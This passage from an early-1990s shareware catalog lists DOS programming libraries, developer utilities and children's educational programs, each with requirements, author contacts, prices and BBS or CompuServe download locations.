Microsoft C + Needs: IBM PC, DOS 2.0 or better. Microsoft C 5.1 or better. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $65.00 + Version: 6.00 (07-01-91) + User benefits: Full source code as well as additional bonus + programs. + Look for: MCOMM.ZIP on BBSs; MCOMM.ZIP in IBMPRO forum LIB 3 on + CompuServe; MCOMM.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 125k + Description: + Need asynch communications in your application? This is the + answer. Makes using communications as simple as reading a file. + Supports up to four COM ports simultaneously, even at high + speeds. Fullly interrupt driven, yet requires no in-depth + technical knowledge. In use by ATT, NASA, GM, AP, and many + others. + + Product: LiteComm(tm) for Turbo C + Needs: IBM PC, DOS 2.0 or better. Turbo C version 2.0 or better. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $65.00 + Version: 6.00 (07-01-91) + User benefits: Full source code as well as additional bonus + programs. + Look for: TCOMM.ZIP on BBSs; TCOMM.ZIP in BPROGB forum LIB 5 on + CompuServe; TCOMM.ZIP in BORLAND RTC LIB 2 on GEnie. + Download size: 125k + Description: + Need asynch communications in your application? This is the + answer. Makes using communications as simple as reading a file. + Supports up to four COM ports simultaneously, even at high + speeds. Fullly interrupt driven, yet requires no in-depth + technical knowledge. In use by ATT, NASA, GM, AP, and many + others. + + Product: Multi-level Pull-down Menus + Needs: IBM PC, DOS 2.0 or better. Turbo C 2.0, Turbo C++, + Borland C++, Microsoft C or QuickC. Works with all standard + adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $39.00 + Version: 2.1 (08-01-89) + User benefits: Complete source code, which can recompile under + any memory model; Voice, BBS and FAX technical support; $9 + upgrade policy for new versions. + Look for: PULLC21.ARC on BBSs (call 214-539-9878 to download it + at no charge); PULC21.ARC in BPROGB forum LIB 5 on CompuServe; + PULLC21.ARC in BORLAND RTC LIB 2 on GEnie. + Download size: 272k + Description: + Super multi-level pull-down menu environment. "Look and feel" + is similar to the TC++ environment. Fully featured and + configurable. Easy fill-in-the-blank concept for development. + + Chapter 12, "Programming" 265 + + + + Has execute, single, and multiple choice menus styles, + unlimited slide-up submenus, slide-under data entry windows, + help windows, message lines. Complete free-field sequential + data entry; pull-down file selection list. Uses QWIKC21 and + WNDWC21 (those products' libraries included). Excellent + tutorial/docs. + + Product: Multi-level virtual windows + Needs: IBM PC, DOS 2.0 or better. Turbo C 2.0, Turbo C++, + Borland C++, Microsoft C or QuickC. Works with all standard + adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $39.00 + Version: 2.1 (08-01-89) + User benefits: Complete source code, which can recompile under + any TP version from 4.0 to 6.0; Voice, BBS and FAX technical + support; $9 upgrade policy for new versions. + Look for: WNDWC21.ARC on BBSs (call 214-539-9878 to download it + at no charge); WNDC21.ARC in BPROGB forum LIB 5 on CompuServe; + WNDWC21.ARC in BORLAND RTC LIB 2 on GEnie. + Download size: 176k + Description: + C library for multi-level virtual windows. Create, hide, move, + resize, rearrange, zoom and access smoothly. Optional true + virtual windows in RAM have phenomonal speeds - even updates + overlapped windows on screen without flicker! Self-centering + windows work in any row/column configuration. For all IBMs, + all text modes, all video pages. Uses the QWIK Screen + Utilities (QWIK55.TPU included). Only 13k of code if all 69 + routines used! Excellent documentation. + + Product: Programmer's SUPER-MAINT [***] + The "easier" make utility. See full description on page 272. + + Product: QWIK Screen Utilities for C + Needs: IBM PC, DOS 2.0 or better. Turbo C 2.0, Turbo C++, + Borland C++, Microsoft C or QuickC. Works with all standard + adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $39.00 + Version: 2.1 (06-01-89) + User benefits: Complete source code, which can recompile under + any memory model; Voice, BBS, and FAX technical support; $9 + upgrade policy for new versions. + Look for: QWIKC21.ARC on BBSs (call 214-539-9878 to download it + at no charge); QWKC21.ARC in BPROGB forum LIB 5 on CompuServe; + QWIKC21.ARC in BORLAND RTC LIB 2 on GEnie. + Download size: 108k + Description: + C library for direct screen writing on ALL IBMs in ANY text or + column mode. Virtual screen capability gives you phenomenal + writing speed and power! Includes self-centering, block + filling routines - all with or without attributes, view/write + all video pages, cursor control, save/restore screen blocks, + + Chapter 12, "Programming" 266 + + + + scroll up/down. This unit contains a PS/2 detection scheme, + and supports dual monitors and Hercules. All 43 optimized + routines were coded in assembler, and fit in <2.7kb! Excellent + documentation. + + Product: TCXL User Interface Development + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 5.52 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TCXL-?.ZIP in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 1000k + Description: + This development system supplements your compiler's + capabilities by providing more than 400 functions which make + complex user interfaces simple to program. Also includes data- + entry forms, context sensitive help, automatic mouse support, + and more. + + Product: TesSeRact Compression System + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TCOMP.ZIP in PCVENC forum + LIB 6 on CompuServe. + Download size: 200k + Description: + Gives you high-speed access to four of the most popular + compression algorythms available. In addition to traditional + file-to-file compression methods, it allows compressing from + file-to-buffer, from buffer-to-file, and from one memory buffer + to another. + + Product: TesSeRact File Management + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TFILE.ZIP in PCVENC forum + LIB 6 on CompuServe. + Download size: 250k + Description: + This indexed file-access system reads/writes dBase-compatible + files, and is integrated with TCXL to provide high-level + control over data entry/editing. + + Chapter 12, "Programming" 267 + + + + Product: TesSeRact Printer Control + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TPRINT.ZIP in PCVENC + forum LIB 6 on CompuServe. + Download size: 150k + Description: + Provides a hardware-independent method for specifying the + appearance of reports and other printed output by arranging + each page of output in a buffer and sending it all to the + printer. + + Product: TesSeRact Screen Designer + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 1.00 (09-09-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TSD.ZIP in PCVENC forum + LIB 6 (multiple files) on CompuServe. + Download size: 85k + Description: + An interactive user-interface design tool capable of creating + clean, commented TCXL code. Combines windows, forms and menus + to allow full-featured program prototyping. + + Product: TesSeRact TSR Devel. System + Needs: IBM PC, DOS 2.1 or better. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Version: 1.10 (09-01-89) + User benefits: Printed Manual and Diskette. + Look for: availability unknown on BBSs; TESS-?.ARC in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 75k + Description: + This is the standard toolkit for TSR development. This product + provides developers with everything needed to create compatible + TSRs that are well-behaved in today's complex environment. + + Chapter 12, "Programming" 268 + + + + Product: The Window BOSS & Data Clerk [***] + Needs: IBM PC, DOS 2.1 or better. "C" Compiler (Microsoft, + Borland, Watcom, Zortech, MIX, Top Speed). + Author: Star Guidance Consulting, Inc., 203-574-2449 + Registration: $55.00 + Version: 7.01 (03-15-92) + User benefits: Source code, phone/CompuServe/GEnie/BIX/mail + support. + Look for: BOSS*.* (multiple files) on BBSs; BOSS*.* in IBMPROG + forum LIB 3 (multiple files) on CompuServe; BOSS*.* in IBM RTC + LIB 9 (multiple files) on GEnie. + Download size: 1200k + Description: + Comprehensive set of windowing, data entry, and mouse + manipulation functions for the "C" language. Pop-up windows, + pull down menus, CUA(s), status lines, and the like can be + easily implemented. The Data Clerk makes it a snap to enter + text, integers, floats, longs, dates, phone numbers, and times. + Complex forms with individual field validation checks, help and + error messages are a snap. The programmer interface is clean, + uncluttered, and easy to remember. Generated code is fast and + small! + + 12.3.3.1 C++ + + Product: Serial++ Asynch Comm Library + Needs: IBM PC, DOS 2.11 or better. Borland C++. At least one + serial port using 8250 UART (or clone). + Author: Cortlandt Technologies, 914-737-8649 + Registration: $24.95 + Version: 1.0 (02-07-91) + User benefits: Printed manual, complete C++ source, 1 year tech + support via mail or CompuServe, upgrade notices. + Look for: availability unknown on BBSs; SPP.EXE in BPROGB forum + LIB 6 on CompuServe. + Download size: 60k + Description: + This safe & efficient class library provides interrupt-driven + serial port support to Borland C++ programs. It comes ready to + link... no TSRs or assembly coding required. Classes are as + easy to use as console i/o in C, yet give complete access to + the 8250 UART, if needed. Handles multiple ports/instances, and + is protected against keyboard interruptions. + + Chapter 12, "Programming" 269 + + + + 12.3.4 Pascal + + Product: KEYTREE TOOLBOX + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal v4.0 or better. + Author: REWSE CONSULTANTS LIMITED + Registration: $50.00 + Version: 3.10 (08-01-91) + User benefits: Technical support by mail. + Look for: KEYTRBOX.ZIP on BBSs. + Download size: 300k + Description: + A set of library routines for Turbo Pascal programmers which + create and maintain randomly accessed files of variable length + records. The indexing algorithm needs only sufficient of the + record key to ensure uniqueness before reading a record (if you + only have one customer whose name starts with Z, you get the + record as soon as you type Z). Any number of files may be + opened and each may have up to 10 multi-field keys. Many other + features. + + Product: Multi-level Pull-down Menus + Needs: IBM PC, DOS 2.0 or better. Turbo Pascal 5.5. Works with + all standard adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $30.00 + Version: 5.5 (08-24-89) + User benefits: Complete source code, which can recompile under + any TP version from 4.0 to 6.0; Voice, BBS and FAX technical + support; $9 upgrade policy for new versions. + Look for: PULL55.ARC on BBSs (call 214-539-9878 to download it at + no charge); PULL55.ARC in BPROGA forum LIB 2 on CompuServe; + PULL55.ARC in BORLAND RTC LIB 3 on GEnie. + Download size: 186k + Description: + Super multi-level pull-down menu environment. Has a "look and + feel" which is similar to TP 5.5's environment. Fully featured + and configurable. Easy fill-in-the-blank concept for + development. Has execute, single, and multiple choice menus + styles, unlimited slide-up submenus, slide-under data entry + windows, help windows, message lines. Complete free-field + sequential data entry; pull-down file selection list. Uses + QWIK 5.5 and WNDW 5.5 (those products' units included). + Excellent tutorial/docs. + + Chapter 12, "Programming" 270 + + + + Product: Multi-level Virtual Windows + Needs: IBM PC, DOS 2.0 or better. Turbo Pascal 5.5. Works with + all standard adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $30.00 + Version: 5.5 (08-24-89) + User benefits: Unknown. + Look for: WNDW55.ARC on BBSs (call 214-539-9878 to download it at + no charge); WNDW55.ARC in BPROGA forum LIB 2 on CompuServe; + WNDW55.ARC in BORLAND RTC LIB 3 on GEnie. + Download size: 123k + Description: + Turbo Pascal 5.5 unit for multi-level virtual windows. Create, + hide, move, resize, rearrange, zoom and access smoothly. + Optional true virtual windows in RAM have phenomonal speeds - + even updates overlapped windows on screen without flicker! For + all IBMs, all text modes, all video pages. Uses the QWIK + Screen Utilities (QWIK55.TPU included). Only 13k of code if + all 69 routines used! Excellent documentation. + + Product: QWIK Screen Utilities + Needs: IBM PC, DOS 2.0 or better. Turbo Pascal 5.5. Works with + all standard adapters. + Author: Eagle Performance Software, 214-539-7855 + Registration: $30.00 + Version: 5.5 (03-04-89) + User benefits: Complete source code, which can recompile under + any TP version from 4.0 to 6.0; Voice, BBS and FAX technical + support; $9 upgrade policy for new versions. + Look for: QWIK55.ARC on BBSs (call 214-539-9878 to download it at + no charge); QWIK55.ARC in BPROGA forum LIB 2 on CompuServe; + QWIK55.ARC in BORLAND RTC LIB 3 on GEnie. + Download size: 99k + Description: + Turbo Pascal 5.5 unit for direct screen writing on ALL IBMs in + ANY text or column mode. Virtual screen power! Includes self- + centering, block filling routines - all with or without + attributes, view/write all video pages, cursor control, save/ + restore screen blocks, scroll up/down. This unit contains a + PS/2 detection scheme, and supports dual monitors and Hercules. + All 43 optimized routines were coded in assembler, and fit in + <2.7kb! Excellent documentation. + + Chapter 12, "Programming" 271 + + + + Product: TechnoJock's Turbo Toolkit + Needs: IBM PC, DOS 2.1 or better. Borland's Turbo Pascal v4.0 or + later compiler. + Author: TechnoJock Software, Inc., 713-493 6354 + Registration: $49.95 + Version: 5.02 (01-01-91) + User benefits: Printed manual, master disks, quick reference + card, newsletter/phone support. + Look for: BUFFER BOARD (multiple files) on BBSs (call 503-747 + 7636 to download it at no charge); TTT*.ZIP in BPROGA forum LIB + 0 (multiple files) on CompuServe. + Download size: 250k + Description: + The main focus of the Toolkit is to give programs a polished + and professional appearance. It includes a host of menu + building tools (pop-up and pull-down), sorted directory + listings, full screen data entry, window support, mouse support + and much more. + + "If you are programming in Turbo Pascal, you absolutely must + have TTT!" - Public-Domain Software & Shareware + + "Looks great! We have decided to implement your Toolkit in in- + house programs for Tech Support" Rich Kabota, Borland Int. + + Product: TesSeRact TSR Devel. System + Makes writing TSRs simple! See full description on page 267. + + 12.3.4.1 OOP Pascal for DOS (Borland) + + Product: TechnoJock's Object Toolkit + Needs: IBM PC, DOS 3.0 or better. Borland's Turbo Pascal v5.5 or + later compiler. + Author: TechnoJock Software, Inc., 713-493 6354 + Registration: $89.95 + Version: 1.00 (07-01-91) + User benefits: Printed manual, master disks, quick reference + card, newsletter/phone support. + Look for: BUFFER BOARD (multiple files) on BBSs (call 503-747 + 7636 to download it at no charge); TOT*.ZIP in BPROGA forum LIB + 0 (multiple files) on CompuServe. + Download size: 250k + Description: + An object-oriented library for building professional user + interfaces, including: windows, menus, full screen input with + Radio buttons, check boxes etc, linked list manager, directory + displays, date management, string manipulation and much more. + + "How can you resist?" PC Magazine + + "I recommend this Toolkit to anyone who needs to write serious + applications in Turbo Pascal, or who just wants to learn about + object oriented programming in general" Turbo User Group + + Chapter 12, "Programming" 272 + + + + 12.3.5 Other + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 65. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 273. + + Product: WinBatch + Windows Batch Language. See full description on page 69. + + + 12.4 'Make' utilities + + Product: Maker + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.02 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: MAKED102.ZIP on BBSs; MAKED1.ZIP in IBMPRO forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Creates program MAKE & LINK files. Eliminates the drudgery (& + errors) of building these files manually. Designed for C + programmers, but has enough generality that it works with many + other languages, as well. + + Product: Programmer's SUPER-MAINT [***] + Needs: IBM PC, DOS 3.1 or better. 640k RAM. Language Compilers, + assemblers. + Author: EmmaSoft, 607-533-4685 + Registration: $55.00 + Version: 2.11 (10-01-91) + User benefits: Printed manual, master disks, support. + Look for: SUPER21*.ZIP (multiple files) on BBSs (call + 607-533-7072 to download it at no charge); SUPER*.ZIP in IBMPRO + forum LIB 3 (multiple files) on CompuServe. + Download size: 540k + Description: + The "easier" make utility, builds your make files and response + files for you. Remembers your command flags, and even the name + of the current make file! "Multiple Setups" lets you work on + several different projects at once. Leaves all but 2K for your + compiler in "swapping mode." + + Supports Microsoft, Borland, Clipper, Aztec and Mix. Mouse + support, context sensitive help, user configurable. + + Chapter 12, "Programming" 273 + + + + Product: Stamper + Changes file/date time stamps. See full description on + page 33. + + + 12.5 Hypertext/hypermedia + + Product: HyperPAD + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Brightbill-Roberts and Company, Ltd., 800-444-3490 + Registration: $99.00 + Version: 2.2 (05-22-91) + User benefits: Printed manual and diskettes; free technical + support; preferred upgrade pricing; special offers and updates. + Look for: HP22D*.ZIP (multiple files) on BBSs (call 315-472-1058 + to download it at no charge); HP22D*.ZIP in PCVENC forum LIB 1 + (multiple files) on CompuServe; HP22D*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 1500k + Description: + The hypermedia platform for character mode MSDOS based + computers, HyperPAD is a fast and flexible object-oriented + environment and development tool featuring visual programming, + a fast and English-like object script langauge with incremental + compiler, and a full set of screen design/drawing tools for + character mode application development. HyperPAD and its + langauge can be easily extended using modules written in C or + Assembler. Comes with an interactive tutorial and dozens of + example pads. + + + 12.6 Programming utilities + + Product: FileXref + Needs: IBM PC, DOS 2.0 or better. Hard disk; printer. + Author: ConVal Software, Inc., 805-529-6847 + Registration: $25.00 + Version: 1.3 (10-01-91) + User benefits: Phone support. + Look for: FILXRF.ZIP on BBSs (call 617-354-8873 to download it at + no charge); FILXRF.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 100k + Description: + A new type of cross reference tool for programmers and + consultants. It scans ALL application source and ASCII + documentation files, producing cross reference information. + + If you change a single file or symbol, FileXref reports show + the other files which may be impacted - other routines, batch + files and documentation! It also lists your unreferenced + obsolete files for you! Supports BASIC, BAT, C, C++, COBOL, + FORTRAN, MASM, Oracle, Pascal, PL/I, REXX, SQL, xBASE and ASCII + text files. + + Chapter 12, "Programming" 274 + + + + Product: NED + A Fast and Powerful Programmers Text Editor. See full + description on page 117. + + Product: PUTMAIL [***] + Needs: IBM PC, DOS 3.0 or better. PVCS from Intersolv, and DOS + based LAN. Optional e-mail system -- See Mail. + Author: Gnosis Inc + Registration: $0.00 + Version: 1.3 (01-01-92) + User benefits: Unknown. + Look for: availability unknown on BBSs; PVCS-L.ZIP in PCVENB + forum LIB 11 on CompuServe. + Download size: 150k + Description: + Simplify your use of PVCS! Use point & select menu system to + make easy check-in's of source code. Extended control + management, & also cross platform development. Users configure + rule based checks including - file .ext standards, auto new + file flagging, dir defaulting, cross-check duplicate files, + PVCS locks, compiles, tests, sign-offs & more! User comments + are auto logged to PVCS. System will match any PVCS file + structure. Makes DOS batch files for all check-ins across LAN, + & cross-platform xfers. + + Product: ReNamer + Needs: IBM PC, DOS 2.0 or better. Hard disk; printer. + Author: ConVal Software, Inc., 805-529-6847 + Registration: $40.00 + Version: 1.1 (06-30-91) + User benefits: Phone support. + Look for: RENAMR.ZIP on BBSs (call 617-354-8873 to download it at + no charge); RENAMR.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 100k + Description: + When you need to change external and/or internal names in your + software, try ReNamer. It automates this tedious manual + exercise, changing ALL references and changing them uniformly! + Use it when porting to a new platform, to re-organize your + naming conventions, to make your code more maintainable - + whenever renaming is called for. + + Supports BASIC, BAT files, C, C++, COBOL, FORTRAN, MASM, MAKE + files, Oracle, Pascal, PL/I, REXX, xBASE, and ASCII text files. + A tool for the professional! + + Chapter 12, "Programming" 275 + + + + Product: RIE - Rimrock Icon Editor + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Rimrock Software, 208-772-9347 + Registration: $29.00 + Version: 1.04 (02-20-92) + User benefits: Printed manual, unlimited support. + Look for: RIE104.ZIP on BBSs (call 208-765-0180 to download it at + no charge); RIE104.ZIP in PCVENC forum LIB 6 on CompuServe. + Download size: 141k + Description: + Now you can dress up text-based programs you create with + graphic images, without rewriting your program for a graphics + display mode. With RIE, you can create 'pseudo-graphic' icons + to display on an EGA or VGA display in text mode. + + Created primarily to support version 6 of TCXL, the TesSeRact C + eXtended Library, but the ICONLOAD example provided shows you + how to load icons on your own. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 120. + + + 12.7 Software tools + + See also: Database applications, Software tools (page 149). + + 12.7.1 For multiple programs + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 70. + + 12.7.2 For other + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 52. + + Product: Btr Help! + Needs: IBM PC, DOS 3.0 or better. BTRIEVE.EXE or BREQUEST.EXE. + Author: Informative Technologies, 202-675-4528 + Registration: $40.00 + Version: 1.88 (06-15-91) + User benefits: Printed Manual with disk; One year of Phone/FAX/ + Mail/Email/BBS support; Bonus Disk of Btrieve Utilities; + Btrieve 'C' Library with full source; Certificate for Free + + Chapter 12, "Programming" 276 + + + + CompuServe Membership; Certificate for $7 off a subscription to + Shareware Magazine. + Look for: BTRHLP??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); BHLP??.ZIP in NOVA forum LIB 14 on CompuServe. + Download size: 180k + Description: + Provides the functions needed for the design, development and + maintenance of applications using Btrieve. It's great for file + maintenance with: Great Plains Accounting, IBM's Platinum + Series, Pacioli 2000 Accounting, Galacticomm BBS, Macola + Accounting, Xtrieve, Magic PC DBMS, DacEasy Accounting or any + application that uses Btrieve. It provides an easy way to + repair damaged Btrieve database files or test their integrity. + Browse and edit records in many different formats -- and much + more! + + Product: Btr Watch + Memory resident Btrieve debugger. See full description on + page 155. + + Product: Changer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.01 (07-06-91) + User benefits: Eligibility for free upgrades. + Look for: CHANO101.ZIP on BBSs; CHAN01.ZIP in IBMPRO forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Quickly changes words & phrases in text files without loading a + bulky word processor or text editor. Options to change files + in multiple directories, and to change hidden or read only + files. Typical uses include changing names in form letters or + other documents, or changing variable names in the source code + of a multimodule program. Built in safety features to prevent + data corruption. + + Product: Convert To Structured BASIC + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $19.95 + Version: 1.3 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: CVT-2SB.EXE on BBSs; CVT-SB.EXE in IBMPRO forum LIB 4 + on CompuServe. + Download size: 65k + Description: + Converts GW-BASIC programs to a more structured, more legible + Structured (compiler) Basic format. + * unpacks multi-statement lines + * block all "IF" statements + * converts line number to labels + + Chapter 12, "Programming" 277 + + + + * removes unnecessary labels + * indents IF and looping structures + * self-extracting LZW archive + + Product: DB2DOC + Automatic DBF documentation for FoxPro/FB+. See full + description on page 152. + + Product: DB2PRG + Automatic DBF file creation for FoxPro/FB+. See full + description on page 152. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 273. + + Product: LiteComm(tm) for Microsoft C + LiteComm Communication Toolbox for Msoft C. See full + description on page 263. + + Product: LiteComm(tm) for Turbo C + LiteComm Communications ToolKit for Turbo C. See full + description on page 264. + + Product: MouseTools + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal. + Author: Arcanum Computing + Registration: $10.00 + Version: 1.0 (09-13-89) + User benefits: Master disks, source code. + Look for: MOUSTL55.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 100k + Description: + Provides a set of mouse interface routines for Turbo Pascal + programmers. Included are low level routines for positioning + and moving mouse cursors as well as higher level routines for + selecting files, multiple choice questions, etc. + + Product: PBfmt + Formats Power Basic Source Code Beautifully! See full + description on page 261. + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 262. + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 150. + + Product: Prgmr's Productivity Pack Lite + Productivity Tools for Programmers. See full description on + page 259. + + Chapter 12, "Programming" 278 + + + + Product: Programmer's Productivity Pack + Productivity Tools for Programmers. See full description on + page 260. + + Product: QQUERY (All Fox versions) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 152. + + Product: QQUERY (FoxBASE+ 2.10 version) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 153. + + Product: QQUERY (FoxPro 1.02 version) + Elaborate Query Manager for FoxPro & FoxBASE+. See full + description on page 153. + + Product: QQUERY (FoxPro 2.0 version) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 154. + + Product: Show Partner Lite + Screen Show and Demo Disk Development System. See full + description on page 303. + + Product: Simply Help! + Needs: IBM PC, DOS 2.1 or better. 384k RAM, hard disk + recommended. + Author: SimpleWare, 709-489-3757 + Registration: $35.00 + Version: 1.0 (01-07-91) + User benefits: Latest version with shareware notices removed. + Support by mail. + Look for: SIMHLP10.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 285k + Description: + Create stand alone help systems or add help to any program. + Editor has pull down menus, dialog boxes, mouse support, on- + line help, block operations, line drawing, import/export, + reports, and many more. Edit your file and instantly RUN it to + see the results. + + Compiler creates EXE files or TSR files with your choice of hot + key. A library for QuickBASIC 4.xx is included. Applications + include TSR help for existing programs, catalogs, readme files, + manuals, on-line help for QuickBASIC programs. + + Product: TesSeRact Screen Designer + Code-Generator for TCXL. See full description on page 267. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 120. + + Chapter 12, "Programming" 279 + + + + Product: Workbase [***] + Dot-prompt utility for DBMS programmers. See full description + on page 155. + + + 12.8 Other + + Product: BOOT.SYS + Use boot-up menus to select system config. See full + description on page 70. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 65. + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 262. + + Product: PullDown SAA Menu Shell + SAA CUA Compliant Dialog Boxed Menu System. See full + description on page 99. + + Chapter 13, "Education" 280 + + + + + + Chapter 13 + Education + + + 13.1 Preschool + + Product: Balloons + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: AssistWare, 919-544-5567 + Registration: $7.00 + Version: 3.8 (03-29-91) + User benefits: Support, updates, information about other + children's programs. + Look for: BALLOONS.* (multiple files) on BBSs (call 317-856-2319 + to download it at no charge); BALLOONS.ZIP in IBMPC RTC LIB 0 + on GEnie. + Download size: 89k + Description: + A simple, easy-to-use program designed to help young children + become familiar with the computer and have fun at the same + time. It provides visual delight for children 18 months and up + and hands-on experience with the computer. Balloons appear as + any key is struck and may be enlarged until they pop into a + rainbow as "Twinkle, Twinkle Little Star" plays. This program + is designed to be your child's first program and to provide + hours of enjoyment. + + Product: Brandon's Bigbox + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robichaux and Associates, 504-752-2620 + Registration: $20.00 + Version: 1.5 (02-04-92) + User benefits: Printed manual, master disks, 90 days support. + Look for: availability unknown on BBSs; BIGBOX.ZIP in IBMAPP + forum LIB 11 (multiple files) on CompuServe. + Download size: 320k + Description: + Contains 26 colorful animated games and drills designed for pre + and beginning readers. Learn alphabet skills, keyboard skills, + shapes and sizes, word matching, sight words, arithmetic, US + geography, plus some plain old FUNTIME! Lots of colorful + animations; also, keep the games fresh by customizing your own + word lists! + + Product: Dr. Motes' Colorbook [***] + Coloring book program for young children. See full description + on page 307. + + Chapter 13, "Education" 281 + + + + Product: DrawSome + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: AssistWare, 919-544-5567 + Registration: $8.00 + Version: 2.4 (03-30-91) + User benefits: Support, updates, information on other children's + programs. + Look for: availability unknown on BBSs; DRAWSOME.ZIP in IBMPC RTC + LIB 0 on GEnie. + Download size: 105k + Description: + A simple program designed to help young children become + familiar with the computer, mouse, and mouse operations. Lines + are drawn on the screen by moving an image of a hand with the + arrow-keys or mouse. Line color is selectable by keys or by + clicking the mouse buttons. The program also draws flowers, + circles, triangles, and squares. + + Excellent program for developing mouse skills, finding the + location of certain keys, and learning basic geometric shapes. + + Product: DressMeUp + Cute paper doll game with stuffed animals. See full + description on page 388. + + Product: EGA Mouse Paint [***] + Electronic Coloring Book. See full description on page 282. + + Product: Pallanda + Somewhat like Candy-Land with color spinner. See full + description on page 362. + + Product: Play 'n' Learn [***] + Needs: IBM PC, DOS 3.1 or better. CGA monitor. + Author: HomeCraft Software, 503-692-3732 + Registration: $10.00 + Version: 3.00 (01-15-92) + User benefits: Unknown. + Look for: availability unknown on BBSs. + Download size: 150k + Description: + An education program for very young children 18 months to 3 + years old. Includes eight basic games with multiple + variations. The games range from very simple - push a key and + get a response type game for 18 month old children - to more + complex alphabet and matching games. Also includes an etch-a- + sketch type drawing game. + + Product: School-Mom [***] + Complete children's education software. See full description + on page 301. + + Chapter 13, "Education" 282 + + + + Product: Strudle + Crayola draw and paint with save and redraw. See full + description on page 307. + + + 13.2 Elementary + + Product: Brandon's Bigbox + Educational fun for beginning and pre-readers. See full + description on page 280. + + Product: Dr. Motes' Colorbook [***] + Coloring book program for young children. See full description + on page 307. + + Product: DressMeUp + Cute paper doll game with stuffed animals. See full + description on page 388. + + Product: EGA Mouse Paint [***] + Needs: IBM PC, DOS 3.3 or better. EGA monitor; Microsoft mouse. + Author: Fischer Grafix & Software + Registration: $20.00 + Version: 4.2 (01-30-92) + User benefits: Master disks, phone support. + Look for: EGAMP.ZIP on BBSs; EGAMP.ZIP in IBMAPP forum LIB 11 on + CompuServe. + Download size: 95k + Description: + If your kids like to color then they will enjoy using the mouse + to color in any of 29 pre-made picture. There are over 70 + colors and patterns to select from in the program. Selecting a + picture and coloring it in is as easy as point and click. An + additional feature is the arrow draw program which allows you + to create and color your own drawings. + + Product: Melissa's Music Flashcards + Music flashcards that are fun. See full description on + page 347. + + Product: MEMORY + Computer version of Concentration. See full description on + page 369. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 296. + + Product: School-Mom [***] + Complete children's education software. See full description + on page 301. + + Chapter 13, "Education" 283 + + + + Product: Spell Games + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $19.00 + Version: 1.1 (06-01-91) + User benefits: Registration, bonus programs, newsletter. + Look for: SPELL.ZIP on BBSs; SPELL.ZIP in IPMAPP forum LIB 11 on + CompuServe. + Download size: 150k + Description: + Practice Spelling as an Olympic Game. Pits your country + angainst another country. Choose spelling words from very easy + to very difficult. Words in the game come from spelling bee + lists. Also, easily add your own spelling words with the built + in editor -- enter your child's weekly spelling words. One of + th + our beta testers went on to win the school's spelling bee (5 + grade), something she had never come close to doing before. + + Product: STS26 + Space 